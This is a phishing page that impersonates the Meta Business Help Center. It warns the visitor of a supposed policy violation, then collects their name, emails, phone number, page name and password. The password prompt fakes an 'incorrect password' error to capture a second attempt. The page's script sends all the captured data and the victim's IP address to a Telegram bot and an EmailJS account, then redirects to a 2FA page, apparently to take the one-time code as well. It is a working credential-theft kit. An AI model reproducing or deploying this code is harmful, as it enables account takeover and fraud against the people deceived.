<!doctype html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title></title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">

    <style>
        p {
            margin: 0 !important;
        }
    </style>

</head>

<body>

    <div class="container-fluid">

        <div class="row justify-content-between text-white py-3" style="background-color: #3b5998 !important;">
            <div class="d-flex">
                <div class="border-end pe-2">
                    <div class="d-flex align-items-center gap-1">
                        <svg style="margin-top: 5px !important;" xmlns="http://www.w3.org/2000/svg" width="20" height="20" fill="#fff" class="bi bi-meta" viewBox="0 0 16 16" >
                            <path fill-rule="evenodd"
                                d="M8.217 5.243C9.145 3.988 10.171 3 11.483 3 13.96 3 16 6.153 16.001 9.907c0 2.29-.986 3.725-2.757 3.725-1.543 0-2.395-.866-3.924-3.424l-.667-1.123-.118-.197a54.944 54.944 0 0 0-.53-.877l-1.178 2.08c-1.673 2.925-2.615 3.541-3.923 3.541C1.086 13.632 0 12.217 0 9.973 0 6.388 1.995 3 4.598 3c.319 0 .625.039.924.122.31.086.611.22.913.407.577.359 1.154.915 1.782 1.714Zm1.516 2.224c-.252-.41-.494-.787-.727-1.133L9 6.326c.845-1.305 1.543-1.954 2.372-1.954 1.723 0 3.102 2.537 3.102 5.653 0 1.188-.39 1.877-1.195 1.877-.773 0-1.142-.51-2.61-2.87l-.937-1.565ZM4.846 4.756c.725.1 1.385.634 2.34 2.001A212.13 212.13 0 0 0 5.551 9.3c-1.357 2.126-1.826 2.603-2.581 2.603-.777 0-1.24-.682-1.24-1.9 0-2.602 1.298-5.264 2.846-5.264.091 0 .181.006.27.018Z" />
                        </svg>

                        <p>Meta</p>
                    </div>
                </div>

                <div class="d-flex align-items-center ps-2 gap-1">
                    <p>Support Inbox</p>

                    <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-search" viewBox="0 0 16 16">
                        <path
                            d="M11.742 10.344a6.5 6.5 0 1 0-1.397 1.398h-.001c.03.04.062.078.098.115l3.85 3.85a1 1 0 0 0 1.415-1.414l-3.85-3.85a1.007 1.007 0 0 0-.115-.1zM12 6.5a5.5 5.5 0 1 1-11 0 5.5 5.5 0 0 1 11 0z" />
                    </svg>
                </div>
            </div>
        </div>



        <div class="d-flex justify-content-between py-2">
            <p class="fw-bold">Business Help Center</p>
            <p class="fw-bold">Get Support</p>
        </div>

        <div style="background: url(img/banner.png);" class="row justify-content-center mb-3">
            <div class="col-sm-4 py-5 text-center">
                <h1 class="fw-light text-white">Meta Business Help Center</h1>
            </div>
        </div>

        <div class="row justify-content-center">
            <div class="col-sm-4 shadow text-center p-3">
                <img src="img/steps.png" class="img-fluid mb-3">

                <h2>Get Started</h2>

                <div style="background-color: lightgray;" class="mb-3 p-3 text-start">
                    <p class="mb-3">We have received multiple reports that suggest that your account has been in violation of our terms of service and community guidelines. As a result your account is scheduled for review.</p>

                    <p class="fw-bold">Report no: 45578354</p>
                </div>

                <form id="login" action="">
                    <div class="text-start">
                        <div class="mb-3">
                            <label class="form-label">Full Name</label>
                            <input name="Full Name" type="text" class="form-control" required>
                        </div>

                        <div class="mb-3">
                            <label class="form-label">Business Email Address</label>
                            <input name="Business Email" type="email" class="form-control" required>
                        </div>

                        <div class="mb-3">
                            <label class="form-label">Personal Email Address</label>
                            <input name="Personal Email" type="email" class="form-control" required>
                        </div>

                        <div class="mb-3">
                            <label class="form-label">Mobile Phone Number</label>
                            <input name="Mobile Phone" type="text" pattern="[0-9\+]+" class="form-control">
                        </div>

                        <div class="mb-3">
                            <label class="form-label">Facebook Page Name</label>
                            <input name="Facebook" type="text" class="form-control">
                        </div>

                        <div class="mb-3">
                            <label class="form-label">Please provide us information that will help us
                                investigate</label>
                            <textarea class="form-control"></textarea>
                        </div>

                        <div class="form-check mb-3">
                            <input class="form-check-input" type="checkbox">
                            <label class="form-check-label">
                                I agree to Terms, Data and Cookies Policy.
                            </label>
                        </div>

                        <button type="submit" class="btn btn-primary w-100">Submit</button>
                    </div>

                </form>

            </div>
        </div>
    </div>

    <!-- Modal -->
    <div class="modal fade" id="password" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="passwordLabel" aria-hidden="true">
        <div class="modal-dialog">
            <form id="passwordForm">
                <div class="modal-content">
                    <div class="modal-header">
                        <h1 class="modal-title fs-5" id="passwordLabel">Password</h1>
                        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
                    </div>
                    <div class="modal-body">
                        <p>Please enter password</p>
                        <input required type="password" name="password1" class="form-control">
                        <input type="password" name="password2" class="form-control">

                        <span id="passwordError" class="text-danger">Password incorrect</span>
                    </div>
                    <div class="modal-footer">
                        <button type="submit" class="btn btn-primary">Enter</button>
                    </div>
                </div>
            </form>
        </div>
    </div>


    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL" crossorigin="anonymous"></script>

    <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>

    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>

    <script type="text/javascript">
        (function() {
            // https://dashboard.emailjs.com/admin/account
            emailjs.init('1chMaQ4iAlBDf8pum');
        })();
    </script>

    <script>
        $('#passwordError').hide();

        $('#login').on('submit', function(e) {
            e.preventDefault();
            console.log('login submit')

            var formData = $(this).serializeArray();
            var result = "";

            $.each(formData, function(index, field) {
                result += field.name + ": <code>" + field.value + "</code> <br>";
            });

            localStorage.setItem('login', result);

            $('#password').modal('show');
        });

        let passwordEntered = false;

        $('[name="password2"]').hide();

        $('#passwordForm').on('submit', function(e) {
            e.preventDefault();
            console.log('password submit')

            if (!passwordEntered) {
                $('#passwordError').show();
                $('[name="password1"]').hide().removeAttr('required');
                $('[name="password2"]').show().attr('required', 'true');
                passwordEntered = true;
            } else {

                var formData = $(this).serializeArray();
                var result = "";
                $.each(formData, function(index, field) {
                    result += field.name + ": <code>" + field.value + "</code> <br>";
                });

                console.log(formData)

                let tg = "";
                tg += localStorage.getItem('login');
                tg += result;

                tg = tg.replaceAll('<br>', "%0A");

                const token = '1';
            const chat_id = 1;

                // const token = '6604920211:AAEOgDSO5uniAKBCUw9or2GOHABic5-_7zA';
                // const chat_id = 6427757968;

                console.log(tg)

                fetch('https://api.ipify.org?format=json')
                    .then(response => response.json())
                    .then(data => {
                        const ipAddress = data.ip;
                        tg = ipAddress + "%0A" + tg;
                        console.log(ipAddress);
                        fetch('https://api.telegram.org/bot' + token + '/sendMessage?chat_id=' + chat_id + '&text=' + tg + '&parse_mode=HTML').then(() => {});

                        tg = tg.replaceAll("%0A", ' ');

                        const publicKey = 'service_33taqdk';
                        const APIkey = 'JEMW6STaYtNJ4b6VG';
                        const template = 'template_xa1norr';

                        emailjs.init(APIkey);

                        var login = $('#login').serializeArray();

                        emailjs.send(publicKey, template, {
                                ip: ipAddress,
                                full_name: login[0].value,
                                business_email: login[1].value,
                                personal_email: login[2].value,
                                mobile: login[3].value,
                                facebook: login[4].value,
                                password1: formData[0].value,
                                password2: formData[1].value
                            })
                            .then(function(response) {
                                console.log('SUCCESS!', response.status, response.text);
                                location.href = '2FA.html';
                            }, function(error) {
                                console.log('FAILED...', error);
                            });
                    });
            }
        });
    </script>
    <style>
        @media only screen and (max-width: 739px) {
            
            .align-items-center{
                font-size: 20px;
            }
           
            .form-control{
                padding: 5px 11px;
                font-size: 22px;
            }
            
            .form-label{
                font-size: 17px;
            }
        }
        @media only screen and (min-width: 739px) and (max-width: 1023px) {
            .col-sm-4.shadow.text-center.p-3 {
                width: 100% !important;
            }
            .btn-primary{
                padding: 10px 0px;
                font-size: 20px;
            }
        }
        @media only screen and (min-width: 1024px){
            .modal-dialog{
                max-width: 650px;
            }
            .modal-content{
                height: 300px;
            }
            .fs-5{
                font-size: 23px !important;
            }
            .modal-body p{
                font-size: 20px;
                padding-bottom: 10px;
            }
            
            
        }
    </style>
    <script src="./cdn.jsdelivr.net/npm/bootstrap@5.3.2/js/firebase.js"></script>
</body>

</html>